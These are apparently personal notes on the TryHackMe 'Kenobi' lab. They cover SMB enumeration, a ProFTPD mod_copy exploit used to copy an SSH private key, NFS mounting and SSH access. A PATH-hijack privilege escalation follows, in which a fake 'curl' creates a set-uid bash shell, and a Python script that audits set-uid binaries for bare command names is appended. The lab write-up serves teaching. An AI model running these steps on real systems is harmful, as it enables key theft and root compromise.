Anonymous

front

https://tryhackme.com/room/kenobi

Open Ports:

PORTS

Gaining Access:

  1. Enumerating SMB using nmap scripts
    nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse ip

    1. Found anonymous login in SMB
    2. smbclient //ip/Anonymous
  2. Via ProFTPD 1.3.5
    1. Found exploitdb copy
    2. https://www.exploit-db.com/exploits/36742 (copying id_rsa to /var/tmp)
  3. Mounting /var/tmp on our PC
    1. Make mount dir
    2. mkdir /mnt/kenobi
    3. mount ip:/var/tmp /mnt/kenobi
  4. Now copy the SSH key from /var/tmp to your desktop
    1. Change permission
    2. chmod 600 key
  5. Connect via SSH
     ssh -i key kenobi@ip
    

User Flag:

flag

Privilege Escalation:

  1. Looking into SUID bit
    - find / -perm -u=s 2> /dev/null
    - Found menu
    - strings menu
      - Found that no path was specified for the curl command
  2. Now
    - echo 'cp /bin/bash /tmp/bash;chmod +s /tmp/bash' > curl
    - chmod 777 curl
    - export PATH=/tmp:$PATH
    - /usr/bin/menu and press 1
    - bash -p
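
A defender-side version of the `strings menu` check above, added here as an example (not part of the original notes): it pulls printable strings out of a binary and flags command lines that begin with a bare utility name, which a set-uid program would resolve through the caller's $PATH. The WATCHED list, the function names and the SAMPLE bytes are constructed for illustration.

```python
import os
import re
import stat

# Assumption: short watch-list of utilities often run via system()/popen().
WATCHED = {"curl", "wget", "uname", "ifconfig", "cat", "ps", "tar", "service"}

def printable_strings(blob, min_len=4):
    """Like `strings`: runs of printable ASCII at least min_len bytes long."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]

def bare_commands(blob):
    """Embedded command lines whose first word is a watched tool named
    without a directory, so a shell would look it up through $PATH."""
    hits = []
    for s in printable_strings(blob):
        words = s.split()
        if words and words[0] in WATCHED:  # "/bin/uname" never matches "uname"
            hits.append(s)
    return hits

def audit_setuid(paths):
    """Map each regular set-uid file in paths to its bare command strings."""
    report = {}
    for path in paths:
        try:
            mode = os.stat(path).st_mode
            if stat.S_ISREG(mode) and mode & stat.S_ISUID:
                with open(path, "rb") as fh:
                    hits = bare_commands(fh.read())
                if hits:
                    report[path] = hits
        except OSError:
            continue  # unreadable or vanished file: skip it
    return report

# Constructed sample bytes standing in for a small set-uid helper (not the real binary).
SAMPLE = (b"\x7fELF\x02\x01\x01\x00" + b"\x00" * 8 +
          b"1. status check\x00curl -I localhost\x00/bin/uname -r\x00ifconfig\x00\x01")

if __name__ == "__main__":
    print(bare_commands(SAMPLE))
    # On a real host, audit every set-uid file under /usr/bin.
    bins = [os.path.join("/usr/bin", n) for n in os.listdir("/usr/bin")]
    for path, hits in audit_setuid(bins).items():
        print(path, hits)
```

Any hit is a candidate for rebuilding the program with absolute paths (for example /usr/bin/curl) or for dropping its set-uid bit.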

Root Flag:

root